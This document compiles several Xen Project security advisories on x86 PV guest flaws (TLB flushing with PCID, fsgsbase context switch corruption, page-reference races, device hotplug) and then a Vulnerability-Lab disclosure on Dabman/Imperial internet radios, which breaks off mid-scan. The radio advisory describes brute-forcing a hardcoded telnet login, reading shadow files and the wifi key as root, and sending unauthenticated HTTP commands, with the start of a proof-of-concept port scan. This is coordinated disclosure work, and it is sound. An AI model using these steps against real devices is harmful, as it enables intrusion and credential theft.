An issue was discovered in Xen through 4.11.x allowing x86 PV guest OS users to cause a denial of service or gain privileges because of an incompatibility between Process Context Identifiers (PCID) and TLB flushes.

**Information**

Advisory

XSA-292

Public release

2019-03-05 12:00

Updated

2019-10-25 11:09

Version

3

CVE(s)

CVE-2019-17346

Title

x86: insufficient TLB flushing when using PCID

**Files**advisory-292.txt (signed advisory file)  
xsa292.meta  
xsa292.patch**Advisory**

\-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

            Xen Security Advisory CVE-2019-17346 / XSA-292
                              version 3

            x86: insufficient TLB flushing when using PCID

UPDATES IN VERSION 3
====================

CVE assigned.

ISSUE DESCRIPTION
=================

Use of Process Context Identifiers (PCID) was introduced into Xen in
order to improve performance after XSA-254 (and in particular its
Meltdown sub-issue).  This enablement implied changes to the TLB
flushing logic.  The particular case of context switch to a vCPU of a
PCID-enabled guest left open a time window between the full TLB flush,
and the actual address space switch, during which additional TLB
entries (from the address space about to be switched away from) can be
accumulated, which will not subsequently be purged.

IMPACT
======

Malicious PV guests may be able to cause a host crash (Denial of
Service) or to gain access to data pertaining to other guests.
Privilege escalation opportunities cannot be ruled out.

Additionally, vulnerable configurations are likely to be unstable even
in the absence of an attack.

VULNERABLE SYSTEMS
==================

Only x86 systems are vulnerable.  ARM systems are not vulnerable.

Only systems running x86 PV guests are vulnerable.  Systems running
only x86 HVM or PVH guests are not vulnerable.

Only systems with at least one PCID-enabled PV guest are vulnerable.

Systems where PCID or INVPCID are unavailable or entirely disabled are
not vulnerable.

Note that PCID is enabled by default for both 64-bit dom0 and 64-bit
domU when hardware supports it.  PCID acceleration has been backported
to the following versions:
 - Xen 4.11.x,
 - Xen 4.10.2 and onwards,
 - Xen 4.9.3 and onwards,
 - Xen 4.8.4 and onwards,
 - Xen 4.7.6.

To exploit this vulnerability, problematic TLB entries must be created
between the full TLB flush and the address space switch.  The NMI
watchdog handler (enabled via the "watchdog" command line option) is
known to create such entries; other vectors cannot be ruled out.

MITIGATION
==========

Running only HVM or PVH guests will avoid this vulnerability.

Running only 32-bit PV guests alongside the other two types mentioned
above will also avoid this vulnerability, provided Dom0 is also 32-bit
or is not using PCID.  Making a 64-bit Dom0 not use PCID can be achieved
by e.g. "xpti=no-dom0 pcid=xpti".

Disabling use of PCID entirely, by passing "pcid=0" or "invpcid=0" as a
command line option to the hypervisor, will also avoid this
vulnerability (albeit re-introducing the XPTI performance regression
use of PCID was intended to reduce).

Disabling the watchdog timer will remove the only known way of reliably
creating problematic TLB entries, potentially reducing the risk of a
successful attack.

CREDITS
=======

This issue was discovered by Sergey Dyasli and Andrew Cooper of Citrix.

RESOLUTION
==========

Applying the attached patch resolves this issue.

xsa292.patch           xen-unstable, Xen 4.11.x ... Xen 4.7.6

$ sha256sum xsa292\*
c515e98e5ae8a16bc5c894741eea5523a7e568f81ee8a570626dcc0f58f40b40  xsa292.meta
f42cb5e1eae5a5c6f0fd84e38df4db9f09a4e1176905c37f292fef9855c82fea  xsa292.patch
$

DEPLOYMENT DURING EMBARGO
=========================

Deployment of the patches and/or mitigations described above (or
others which are substantially similar) is permitted during the
embargo, even on public-facing systems with untrusted guest users and
administrators.

But: Distribution of updated software is prohibited (except to other
members of the predisclosure list).

Predisclosure list members who wish to deploy significantly different
patches and/or mitigations, please contact the Xen Project Security
Team.

(Note: this during-embargo deployment notice is retained in
post-embargo publicly released Xen Project advisories, even though it
is then no longer applicable.  This is to enable the community to have
oversight of the Xen Project Security Team's decisionmaking.)

For more information about permissible uses of embargoed information,
consult the Xen Project community's agreed Security Policy:
  http://www.xenproject.org/security-policy.html
-----BEGIN PGP SIGNATURE-----

iQFABAEBCAAqFiEEI+MiLBRfRHX6gGCng/4UyVfoK9kFAl2y1+cMHHBncEB4ZW4u
b3JnAAoJEIP+FMlX6CvZV48H/i1Wi6DV90quHvewv0j792crdJojnHgq/8V3+hfT
lXWcmfW5IQLi02o4aG7XjUYwRTQ6clRgF4AZDZyrAY15QyVCz9diusvWOUzaq7Pd
hrvuIMeaB3+ba2OY7bB3P0sCekhhj6MwqKEhGVlbLEB8A0vGq9XjZBuTmws6QA2J
6Il8fxEVupdtETsf3KlYfxvJOubN/B+tByaIpdWU0C2M66EVa4pcijSLcvoylGxi
YS7jJrSMcqg4Sx/e/HnzCJ7jrvzhxSDHeyhPy1/NrwlQz2NQjd+FoFownsH48LuH
6LA6GGTIk5v+a/GtNVpb8Wwfg0UleabF+8S30C6QasUO70E=
=Pk5K
-----END PGP SIGNATURE-----

Xenproject.org Security Team

CVE-2019-17346: 292 - Xen Security Advisories

An issue was discovered in Xen through 4.11.x allowing x86 PV guest OS users to cause a denial of service because of an incompatibility between Process Context Identifiers (PCID) and shadow-pagetable switching.

**Information**

Advisory

XSA-294

Public release

2019-03-05 12:00

Updated

2019-10-25 11:09

Version

3

CVE(s)

CVE-2019-17348

Title

x86 shadow: Insufficient TLB flushing when using PCID

**Files**advisory-294.txt (signed advisory file)  
xsa294/4.7.patch  
xsa294/4.8.patch  
xsa294/4.9.patch  
xsa294/4.10.patch  
xsa294/4.11.patch  
xsa294/unstable.patch**Advisory**

\-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

            Xen Security Advisory CVE-2019-17348 / XSA-294
                              version 3

         x86 shadow: Insufficient TLB flushing when using PCID

UPDATES IN VERSION 3
====================

CVE assigned.

ISSUE DESCRIPTION
=================

Use of Process Context Identifiers (PCID) was introduced into Xen in
order to improve performance after XSA-254 (and in particular its
Meltdown sub-issue).  This enablement implied changes to the TLB
flushing logic.  One aspect which was overlooked is the safety of
switching between shadow pagetables, which previously relied on the
unconditional flushing of a write to CR3.

With PCID enabled, a switch of shadow pagetable for a 64bit PV guest
fails to invalidate the linear mappings of the previous shadow
pagetable.  As a result, subsequent accesses to the shadow pagetables
may be deemed to be safe by the shadow logic (based on the old shadow
pagetable) but fault when made in practice.

IMPACT
======

Malicious 64bit PV guests may be able to cause a host crash (Denial of
Service).

Additionally, vulnerable configurations are unstable even in the absence
of an attack.

VULNERABLE SYSTEMS
==================

Only x86 systems are vulnerable.  ARM systems are not vulnerable.

Only systems running 64-bit x86 PV guests are vulnerable.  Systems running
only x86 HVM or PVH or 32bit PV guests are not vulnerable.

Only systems with at least one PCID-enabled PV guest are vulnerable.

Systems where PCID or INVPCID are unavailable or entirely disabled are
not vulnerable.

Note that PCID is enabled by default for both 64-bit dom0 and 64-bit
domU when hardware supports it.  PCID acceleration has been backported
to the following versions:
 - Xen 4.11.x,
 - Xen 4.10.2 and onwards,
 - Xen 4.9.3 and onwards,
 - Xen 4.8.4 and onwards,
 - Xen 4.7.6.

MITIGATION
==========

Running only HVM or PVH guests will avoid this vulnerability.

Disabling use of PCID entirely, by passing "pcid=0" or "invpcid=0" as a
command line option to the hypervisor, will also avoid this
vulnerability (albeit re-introducing the XPTI performance regression
use of PCID was intended to reduce).

CREDITS
=======

This issue was discovered by Jan Beulich of SUSE.

RESOLUTION
==========

Applying the appropriate attached patch resolves this issue.

xsa294/unstable.patch           xen-unstable
xsa294/4.11.patch               Xen 4.11.x
xsa294/4.10.patch               Xen 4.10.x
xsa294/4.9.patch                Xen 4.9.x
xsa294/4.8.patch                Xen 4.8.x
xsa294/4.7.patch                Xen 4.7.x

$ sha256sum xsa294\*/\*
c10b7b79a2067cc6d95e40bc78ee8fddaf31f8614bb183fdd5f00e4272e08a0e  xsa294/4.7.patch
3ac1c3caf01feaf341e977fcbae691f2e4425aa9691f2dfa66795acfe823d76e  xsa294/4.8.patch
a8dfc8b2d2f0d0865b70fb0051f9d5a80a6c7456d004957a0155d989ec875611  xsa294/4.9.patch
c6fe1e0173b665a88cbab423737dcb060eed1f634f9bca880d9ddfa2ac855d03  xsa294/4.10.patch
61a341510f45c0cf63a7438645f5c2b3ab1cd72bc2476e5fad331e322f834f4a  xsa294/4.11.patch
1fb22eab53f9b1e93fc25f5a08d37121a9278854174f1fbd495b3fe6e8babf3a  xsa294/unstable.patch
$

DEPLOYMENT DURING EMBARGO
=========================

Deployment of the patches and/or mitigations described above (or
others which are substantially similar) is permitted during the
embargo, even on public-facing systems with untrusted guest users and
administrators.

But: Distribution of updated software is prohibited (except to other
members of the predisclosure list).

Predisclosure list members who wish to deploy significantly different
patches and/or mitigations, please contact the Xen Project Security
Team.


(Note: this during-embargo deployment notice is retained in
post-embargo publicly released Xen Project advisories, even though it
is then no longer applicable.  This is to enable the community to have
oversight of the Xen Project Security Team's decisionmaking.)

For more information about permissible uses of embargoed information,
consult the Xen Project community's agreed Security Policy:
  http://www.xenproject.org/security-policy.html
-----BEGIN PGP SIGNATURE-----

iQFABAEBCAAqFiEEI+MiLBRfRHX6gGCng/4UyVfoK9kFAl2y1/cMHHBncEB4ZW4u
b3JnAAoJEIP+FMlX6CvZH54H/iShmv1F1GDALKhJJdm+BOEtyVy+ZCFU5Atn97dV
3Bm+3BtX1Nfcd1pnLdzQs0ocasw+FSp0Swq93nrpM8hPK9ze4aAKwo/Srhf/WV2/
V9N5lKwxCUub6p2QbAcqj//zLxv0llkhduVGzV9/NXOzeLn5Rp2Af/rgSchQ4QHp
oEdHXNV93Pm1pi4NpCu8uXQAW4Mp7rRiWJPuBkuJDhgVftXItSNMc6jLunJS581X
z+3SmLpfF3IDVpa5GqjtFJ3Exk9DJe4oYHZPmb2qwJTsfV20emIc/7mARGErgdwT
jpRjss41gJX1l41zRF9mwKPc1qPW6Rc9xgh6q1jrjY1CCvk=
=TV/a
-----END PGP SIGNATURE-----

Xenproject.org Security Team

CVE-2019-17348: 294 - Xen Security Advisories

An issue was discovered in Xen through 4.11.x allowing x86 PV guest OS users to cause a denial of service or gain privileges because a guest can manipulate its virtualised %cr4 in a way that is incompatible with Linux (and possibly other guest kernels).

**Information**

Advisory

XSA-293

Public release

2019-03-05 12:00

Updated

2019-10-25 11:09

Version

4

CVE(s)

CVE-2019-17347

Title

x86: PV kernel context switch corruption

**Files**advisory-293.txt (signed advisory file)  
xsa293.meta  
xsa293/4.7-1.patch  
xsa293/4.7-2.patch  
xsa293/4.7-3.patch  
xsa293/4.8-1.patch  
xsa293/4.8-2.patch  
xsa293/4.8-3.patch  
xsa293/4.9-1.patch  
xsa293/4.9-2.patch  
xsa293/4.10-1.patch  
xsa293/4.10-2.patch  
xsa293/4.11-1.patch  
xsa293/4.11-2.patch  
xsa293/unstable-1.patch  
xsa293/unstable-2.patch**Advisory**

\-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

            Xen Security Advisory CVE-2019-17347 / XSA-293
                              version 4

                x86: PV kernel context switch corruption

UPDATES IN VERSION 4
====================

Correct affected versions statement.

CVE assigned.

ISSUE DESCRIPTION
=================

On hardware supporting the fsgsbase feature, 64bit PV guests can set and
clear the applicable control bit in its virtualised %cr4, but the
feature remains fully active in hardware.  Therefore, the associated
instructions are actually usable.

Linux, which does not currently support this feature, has various
optimisations in its context switch path which justifiably assume that
userspace can't actually make changes without a system call.

Xen's behaviour of having this feature active behind the guest kernel's
back undermines the correctness of any context switch logic which
depends on the feature being disabled.

Userspace can therefore corrupt fsbase or gsbase (commonly used for
Thread Local Storage) in the next thread to be scheduled on the
current vcpu.

IMPACT
======

A malicious unprivileged guest userspace process can escalate its
privilege to that of other userspace processes in the same guest, and
potentially thereby to that of the guest operating system.

Additionally, some guest software which attempts to use this CPU
feature may trigger the bug accidentally, leading to crashes or
corruption of other processes in the same guest.

VULNERABLE SYSTEMS
==================

Xen versions 4.4 and later are vulnerable.  Xen 4.3 and earlier are not
vulnerable.

Only x86 hardware with the fsgsbase feature is vulnerable.  This is
believed to be Intel IvyBridge and later hardware, and AMD Steamroller
and later hardware.

ARM hardware is not affected.

Only 64bit PV guests can exploit the vulnerability.  32bit PV guests,
and HVM/PVH guests cannot exploit the vulnerability.

Whether the bug is exploitable, and whether it will be triggered by
accident, depend in a complicated way on the guest operating system
and its configuration.  Most guests are vulnerable to malicious
userspace processes.

MITIGATION
==========

Running only 32bit PV or HVM/PVH guests will avoid this vulnerability.

CREDITS
=======

This issue was discovered by Andy Lutomirski.

RESOLUTION
==========

Applying the appropriate attached patches resolves this issue.

xsa293/unstable-?.patch         xen-unstable
xsa293/4.11-?.patch             Xen 4.11.x
xsa293/4.10-?.patch             Xen 4.10.x
xsa293/4.9-?.patch              Xen 4.9.x
xsa293/4.8-?.patch              Xen 4.8.x
xsa293/4.7-?.patch              Xen 4.7.x

$ sha256sum xsa293\* xsa293\*/\*
27baf055642a3a7e9d2b1a961e15a46b592eca7c6f63e28e3bcb19e4cebfd0bd  xsa293.meta
865596b3dca81712a7d3d78f22e40aed1a08732f93b1950af6f092d893323a0f  xsa293/4.7-1.patch
032559c4bbdfe0987b9d3b15cf8661d8d8a5d4e2e989c944490ac171305fba3b  xsa293/4.7-2.patch
d3d91a1a5083b0a1992750b808aefacd0f0d4e7e92d1436e620a542e935cdadd  xsa293/4.7-3.patch
14b3db49375e353394b831a342d873d83615285d516f8cb08a0e1564d675cd51  xsa293/4.8-1.patch
1efc2ee18f54c7c41f478e944b3b708eb283bfa9de68a1046033d57784846c30  xsa293/4.8-2.patch
0d28899cad0e6798ae6a96717c15363ddf5a35e334ede02becdc81538ae589cc  xsa293/4.8-3.patch
b24210a74eb9dca5c7af902d223dba1b1b372df06a99fb1b0df8e92c9f9632f3  xsa293/4.9-1.patch
f68101f80d9843c1cdbb70188caec7009a0d52d33d811d22091e7c1f265a15e1  xsa293/4.9-2.patch
194e42599eac16afab14856760901705a0600c1308645495f30d30f8dd68734c  xsa293/4.10-1.patch
1fdee59bba66bd6b3ea4949913457dbcb1b8d5cb85fd8fb60aacac9a403ee9a9  xsa293/4.10-2.patch
277ba95e9a2276378fc9b3bcf89b694b9670256cde62278ade2e90d3fd5f7c46  xsa293/4.11-1.patch
724a0f433427a747876cbec09381dc1ca99286cea0ecbdd098c6e68fb135eeda  xsa293/4.11-2.patch
837eb67900a7c70cf7a00836cb312506925ca1fd29529144ff312316b0dbb086  xsa293/unstable-1.patch
0a6df8c8778a1c7e1fb71825695a86dee36f2e9345b39a06e3a364ad8b938de0  xsa293/unstable-2.patch
$

DEPLOYMENT DURING EMBARGO
=========================

Deployment of the patches and/or mitigations described above (or
others which are substantially similar) is permitted during the
embargo, even on public-facing systems with untrusted guest users and
administrators.

But: Distribution of updated software is prohibited (except to other
members of the predisclosure list).

Predisclosure list members who wish to deploy significantly different
patches and/or mitigations, please contact the Xen Project Security
Team.


(Note: this during-embargo deployment notice is retained in
post-embargo publicly released Xen Project advisories, even though it
is then no longer applicable.  This is to enable the community to have
oversight of the Xen Project Security Team's decisionmaking.)

For more information about permissible uses of embargoed information,
consult the Xen Project community's agreed Security Policy:
  http://www.xenproject.org/security-policy.html
-----BEGIN PGP SIGNATURE-----

iQFABAEBCAAqFiEEI+MiLBRfRHX6gGCng/4UyVfoK9kFAl2y1+8MHHBncEB4ZW4u
b3JnAAoJEIP+FMlX6CvZ+v0H/21IMJyzcEdBt5Ki3zJ4gWL5XKxzy7p5r8IyvLto
KulFRzMU2gopsrSji394Inl+iydSEgSRGNMytpJ6HlYmAH+O5xJe3BVsLyf4tvTO
ONTs72xin6mm3h/cUSVtLzTfLAYX6AA37uy/kqUOGH9Bn1VDNhKFDwTjwb7riaDe
cHpvCaQJGK9HBYjzD8HyAfh0nKupgLb19FdG5r2CjXqyHK1A+bC3LPdOc9jfNYrY
YP4LV0nSU5XOBi6RrOSXySadvQQTXtaFACtpcRGQEhrXKmO+bUCQiyJzn2JtmxZP
7uMN9OqR6idl3mxgBb1QiHfxIFw2NB/MC6BoTBn4+Ea7yJk=
=cxjY
-----END PGP SIGNATURE-----

Xenproject.org Security Team

CVE-2019-17347: 293 - Xen Security Advisories

An issue was discovered in Xen through 4.11.x allowing x86 PV guest OS users to cause a denial of service or gain privileges by leveraging a race condition that arose when XENMEM_exchange was introduced.

**Information**

Advisory

XSA-287

Public release

2019-03-05 12:00

Updated

2019-10-25 11:09

Version

3

CVE(s)

CVE-2019-17342

Title

x86: steal\_page violates page\_struct access discipline

**Files**advisory-287.txt (signed advisory file)  
xsa287.meta  
xsa287.patch  
xsa287-4.7.patch  
xsa287-4.8.patch  
xsa287-4.9.patch  
xsa287-4.10.patch  
xsa287-4.11.patch**Advisory**

\-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

            Xen Security Advisory CVE-2019-17342 / XSA-287
                              version 3

         x86: steal\_page violates page\_struct access discipline

UPDATES IN VERSION 3
====================

CVE assigned.

ISSUE DESCRIPTION
=================

Xen's reference counting rules were designed to allow pages to change
owner and state without requiring a global lock.  Each page has a page
structure, and a very specific set of access disciplines must be
observed to ensure that pages are freed properly, and that no writable
mappings exist for PV pagetable pages.

Unfortunately, when the XENMEM\_exchange hypercall was introduced,
these access disciplines were violated, opening up several potential
race conditions.

IMPACT
======

A single PV guest can leak arbitrary amounts of memory, leading to a
denial of service.

A cooperating pair of PV and HVM/PVH guests can get a writable
pagetable entry, leading to information disclosure or privilege
escalation.

Privilege escalation attacks using only a single PV guest or a pair of
PV guests have not been ruled out.

Note that both of these attacks require very precise timing, which may
be difficult to exploit in practice.

VULNERABLE SYSTEMS
==================

Only x86 systems are vulnerable.

Only systems which run PV guests are vulnerable.  Systems which run
only HVM/PVH guests are not vulnerable.

MITIGATION
==========

Running only HVM or PVH guests will avoid these vulnerabilities.

CREDITS
=======

This issue was discovered by Jan Beulich of SUSE.

RESOLUTION
==========

Applying the appropriate attached patch resolves this issue.

xsa287.patch           xen-unstable
xsa287-4.11.patch      Xen 4.11.x
xsa287-4.10.patch      Xen 4.10.x
xsa287-4.9.patch       Xen 4.9.x
xsa287-4.8.patch       Xen 4.8.x
xsa287-4.7.patch       Xen 4.7.x

$ sha256sum xsa287\*
ae2b9261e26df871693478629c63970ba30817ee1dcb2266b89d8b067833c1b3  xsa287.meta
7de1b886d69dd7c497f88d41adf9a6f7cf9a305fd8ae9d714e1125e2a22208ab  xsa287.patch
55f40f2f9bb41c85ac80dac775352e28b25fada80dae574e9d10300d5e2b91ce  xsa287-4.7.patch
57312ff131eb6b51235723e862adf42ad3529ed13135375875c054fa0b55f80b  xsa287-4.8.patch
34f4b835766a38bcf4066ccbab74676eda176e15ed2a6bd7884678a64507f89a  xsa287-4.9.patch
c7eaf8a325011dda84b02ee097ddbc7b5f2f4d3399de545a3a7b14e2d23f4278  xsa287-4.10.patch
6793315f714a249a4fad12b36559640b2f97f19f5b85f0d58694c6e78aa3d567  xsa287-4.11.patch
$

DEPLOYMENT DURING EMBARGO
=========================

Deployment of the patches and/or mitigations described above (or
others which are substantially similar) is permitted during the
embargo, even on public-facing systems with untrusted guest users and
administrators.

But: Distribution of updated software is prohibited (except to other
members of the predisclosure list).

Predisclosure list members who wish to deploy significantly different
patches and/or mitigations, please contact the Xen Project Security
Team.

(Note: this during-embargo deployment notice is retained in
post-embargo publicly released Xen Project advisories, even though it
is then no longer applicable.  This is to enable the community to have
oversight of the Xen Project Security Team's decisionmaking.)

For more information about permissible uses of embargoed information,
consult the Xen Project community's agreed Security Policy:
  http://www.xenproject.org/security-policy.html
-----BEGIN PGP SIGNATURE-----

iQFABAEBCAAqFiEEI+MiLBRfRHX6gGCng/4UyVfoK9kFAl2y18cMHHBncEB4ZW4u
b3JnAAoJEIP+FMlX6CvZMbcIAKcMpCX29ANW9/W2cnGremzicicGAQW9KvmZVK5e
weLBItv9pTqIGeVm71/X2dXt5KeRryh+Py53zYtUhy4pFQXQAezEzlRs+Y4TtX3l
+XVsfDFqks+bfyduBKMerwJpqr2Hd3DOdvir8iSqH2jHLLd5JqTYho+m0L0HPD9J
Smn43rwurMChSjSFR4H+TnrOcX/1iUWgj3BVUkswGn3CrUdBJFe5mp6QeoYlyiL1
CN6rmx5+CWLvBTwMkEiA8/3GX322qv4f2P0woOnaFW+aNgj1VRcyB2l1V0ParYYw
0Yfj32XNIhdzNfUanenRAUNnTYSzVFFdbTMgV2sgwZjXNgE=
=7jA5
-----END PGP SIGNATURE-----

Xenproject.org Security Team

CVE-2019-17342: 287 - Xen Security Advisories

An issue was discovered in Xen through 4.11.x allowing x86 PV guest OS users to cause a denial of service or gain privileges by leveraging a page-writability race condition during addition of a passed-through PCI device.

**Information**

Advisory

XSA-285

Public release

2019-03-05 12:00

Updated

2019-10-25 11:09

Version

3

CVE(s)

CVE-2019-17341

Title

race with pass-through device hotplug

**Files**advisory-285.txt (signed advisory file)  
xsa285.meta  
xsa285.patch  
xsa285-4.11.patch**Advisory**

\-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

            Xen Security Advisory CVE-2019-17341 / XSA-285
                              version 3

                 race with pass-through device hotplug

UPDATES IN VERSION 3
====================

CVE assigned.

ISSUE DESCRIPTION
=================

When adding a passed-through PCI device to a domain after it was already
started, IOMMU page tables may need constructing on the fly.  For PV
guests the decision whether a page ought to have a mapping is based on
whether the page is writable, to prevent IOMMU access to things like
page tables.  Writablility of a page may, however, change at any time.
Failure of the relevant code to respect this possible race may lead
to IOMMU mappings of, in particular, page tables, allowing the guest
to alter such page tables without Xen auditing the changes.

IMPACT
======

Malicious PV guests can escalate their privilege to that of the
hypervisor.

VULNERABLE SYSTEMS
==================

All versions of Xen are vulnerable.

Only x86 systems are vulnerable.  ARM systems are not vulnerable.

Only x86 PV guests can exploit the vulnerability.  x86 HVM and PVH
guests cannot exploit the vulnerability.

Only guests which are assigned a device after domain creation can
exploit this vulnerability.  Guests which are not assigned devices, or
guests assigned devices at domain creation time, cannot exploit this
vulnerability.

MITIGATION
==========

Running only HVM or PVH guests avoids the vulnerability.

Assigning passed-through PCI devices to PV guests at domain creation
time also avoids the vulnerability.

CREDITS
=======

This issue was discovered by Jan Beulich of SUSE.

RESOLUTION
==========

Applying the appropriate attached patch resolves this issue.

xsa285.patch           xen-unstable
xsa285-4.11.patch      Xen 4.7.x - Xen 4.11.x

$ sha256sum xsa285\*
0851a4a9120220e2b03eafaf94648077154b6a6f27c29055d3779ccad7684fce  xsa285.meta
9e96d3763158edde8d664c3e26761e63ca6f96bb921e0d7eb68351fe47499bde  xsa285.patch
38ec20b04e0a859abe9850803ae00a33e48591a9949e5287dfa3725f3bd179f3  xsa285-4.11.patch
$

DEPLOYMENT DURING EMBARGO
=========================

Deployment of the patches and/or mitigations described above (or
others which are substantially similar) is permitted during the
embargo, even on public-facing systems with untrusted guest users and
administrators.

But: Distribution of updated software is prohibited (except to other
members of the predisclosure list).

Predisclosure list members who wish to deploy significantly different
patches and/or mitigations, please contact the Xen Project Security
Team.

(Note: this during-embargo deployment notice is retained in
post-embargo publicly released Xen Project advisories, even though it
is then no longer applicable.  This is to enable the community to have
oversight of the Xen Project Security Team's decisionmaking.)

For more information about permissible uses of embargoed information,
consult the Xen Project community's agreed Security Policy:
  http://www.xenproject.org/security-policy.html
-----BEGIN PGP SIGNATURE-----

iQFABAEBCAAqFiEEI+MiLBRfRHX6gGCng/4UyVfoK9kFAl2y178MHHBncEB4ZW4u
b3JnAAoJEIP+FMlX6CvZnhUIALWg5ROzP7vpvNOEQDICm/A/AxjPLB6uHnj95bBJ
CxfLZPZyxUak9jmn8bJJrhJBNGS/RFUWrwWm+mHku8ywNKTcHkhGtweS8/GjuMeG
I7hhh/Ux39vs/kPWvy7uydMIMrcIsiG69NWXl6xWMGkcmcmlkJCAi2KHX20Jb5qi
Izy7swNoBFWuuGMaBTg8YJ+XfqQGonemzgviY01EHQqJo/2wPyJjgsbZzu6XlNJc
R3K9K4RDzjtemIEQps9CWA8ilEXxv6DIhVKBx0gNLIrJZPVEh2awLr5Ve2YZIdk6
N5hSP2LFyueDhmKvwrMnrrKF4XqHlfyIsW0l8TXwa/OUTVI=
=6noj
-----END PGP SIGNATURE-----

Xenproject.org Security Team

CVE-2019-17341: 285 - Xen Security Advisories

TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have insufficient access control for the /set_dname, /mylogo, /LocalPlay, /irdevice.xml, /Sendkey, /setvol, /hotkeylist, /init, /playlogo.jpg, /stop, /exit, /back, and /playinfo commands.

Document Title: =============== Dabman & Imperial (i&d) - Multiple Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get\_content.php?id=2183 Video: https://www.vulnerability-lab.com/get\_content.php?id=2190 Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13473 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13474 CVE-ID: ======= CVE-2019-13473 Release Date: ============= 2019-09-09 Vulnerability Laboratory ID (VL-ID): ==================================== 2183 Common Vulnerability Scoring System: ==================================== 9.9 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 10.000€ - 25.000€ Product & Service Introduction: =============================== Since 1993, TELESTAR has been synonymous with quality and a very good price/performance ratio in the consumer electronics segment. TELESTAR-DIGITAL GmbH distributes high-quality reception technology for digital TV reception via satellite (DVB-S), cable (DVBC) or terrestrial (DVB-T) from its headquarters in the Vulkaneifel region of Germany. The product portfolio includes digital receivers and the latest generation of television sets as well as modern distribution and single-cable technology, satellite to IP reception solutions and radio transmission systems. The product range is rounded off by Germany's most comprehensive range of accessories for digital television reception. (Copy of the Homepage: https://www.xing.com/companies/telestar-digitalgmbh ) Abstract Advisory Information: ============================== The vulnerability laboratory research team discovered multiple vulnerabilities in the dabman and imperial web radio devices series (typ d & i). Vulnerability Disclosure Timeline: ================================== 2019-06-01: Researcher Notification & Coordination (Security Researcher) 2019-06-02: Vendor Notification (Telestar Digital Data Security Department) 2019-06-07: Vendor Response/Feedback (Telestar Digital Data Security Department) 2019-08-30: Vendor Fix/Patch (Service Developer Team) 2019-09-08: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Critical Authentication Type: ==================== Pre Auth (No Privileges or Session) User Interaction: ================= No User Interaction Disclosure Type: ================ Coordinated Disclosure Technical Details & Description: ================================ 1.1 The dabman and imperial manufactured web radio series (typ d & i) suffers from a weak password vulnerability. The vulnerabilites allows local and remote attackers to compromise the web radios full embedded linux busybox os. The vulnerability is located within an undocumented telnet service (telnetd) of the linux busybox and is turned permanently on. The telnetd service uses weak passwords with hardcoded credentials on the local embedded linux busybox of the internet radio devices. The telnet password can be cracked by usage of simple manual password bruteforce technics or by basic automated attacks with scripts (exp. ncrack). After receiving the password the remote or local network attacker can unauthorized login to the internet radio device to use the embedded linux busybox operating system. After the attacker has been logged in as root user, he can open the /etc/ path to cat gshadow, shadow and the conf files. At the end the attacker has finally full root access on the busybox (telnetd), he can access the web-server (httpd) as admin and see the wireless lan + unencrypted key in ./flash/ - wifi.cfg. A demo exploit poc is available in the wild. Due to some deeper researcher we identified also another manufacturer that uses the same typ of default manufactured system. The same undocumented telnet service was uncovered during the analysis. The manufacturer is still processing a patch. Vulnerable Protocol(s): \[+\] telnetd System(s): \[+\] BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash) (Debian Linux PreRelease - ARM 3.3.2) Firmware Version(s): \[+\] TN81HH96-g102h-g102 Manufacturer: Telestar Digital Gmbh Affected Version(s): \[+\] Bobs Rock Radio \[+\] Dabman D10 \[+\] Dabman i30 Stereo \[+\] Imperial i110 \[+\] Imperial i150 \[+\] Imperial i200 \[+\] Imperial i200-cd \[+\] Imperial i400 \[+\] Imperial i450 \[+\] Imperial i500-bt \[+\] Imperial i600 1.2 The dabman and imperial manufactured web radio series (typ d & i) suffers from a command execution vulnerability. The vulnerability allows local and remote attackers unauthorized and unauthenticated send commands to comprimise the web radio devices. The vulnerability is located httpd web-server communcation on port 80 and 8080. Local and remote attackers can send basic GET commands with basic command line tools (exp. curl or modhttp) to modify or manipulate http requests. The attacker can also capture the http airmusic commands to reverse engineer the radio device for unauthorized interactions. The system has no protection mechanism to block unauthorized transmit of commands. The web radio as well not owns an auth or reminder mechanism to ensure only allowed or trusted sources can transmit the commands (client, system, mac , auth ...). Vulnerable Protocol(s): \[+\] httpd Module(s): \[+\] UIData (Web UI on 80 or 8080) Function(s): \[+\] /set\_dname \[+\] /mylogo \[+\] /LocalPlay \[+\] /LocalPlay \[+\] /irdevice.xml \[+\] /Sendkey \[+\] /setvol \[+\] /hotkeylist \[+\] /init \[+\] /playlogo.jpg \[+\] /stop \[+\] /exit \[+\] /back \[+\] /playinfo Parameter(s): \[+\] ?name= \[+\] ?url=./\*.jpg \[+\] ?url=/stream.wav&name=\* \[+\] ?url=/msg.wav&save=\* \[+\] ?key=\* \[+\] ?vol=\*0&mute=\* \[+\] ?language=\* Affected Function(s): \[+\] Air Music Controls Manufacturer: Telestar Digital Gmbh Affected Version(s): \[+\] Bobs Rock Radio \[+\] Dabman D10 \[+\] Dabman i30 Stereo \[+\] Imperial i110 \[+\] Imperial i150 \[+\] Imperial i200 \[+\] Imperial i200-cd \[+\] Imperial i400 \[+\] Imperial i450 \[+\] Imperial i500-bt \[+\] Imperial i600 Proof of Concept (PoC): ======================= 1.1 Undocumented Telnet Service (telnetd) The security vulnerability can be exploited by local and remote attackers without user interaction or privileged user account. For security demonstration or to reproduce follow the provided information and steps below to continue. Nmap Portscan Scanning R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) \[1000 ports\] Discovered open port 8080/tcp on 93.234.141.215 Discovered open port 80/tcp on 93.234.141.215 Discovered open port 23/tcp on 93.234.141.215 Completed SYN Stealth Scan at 14:48, 13.38s elapsed (1000 total ports) Initiating Service scan at 14:48 Scanning 3 services on 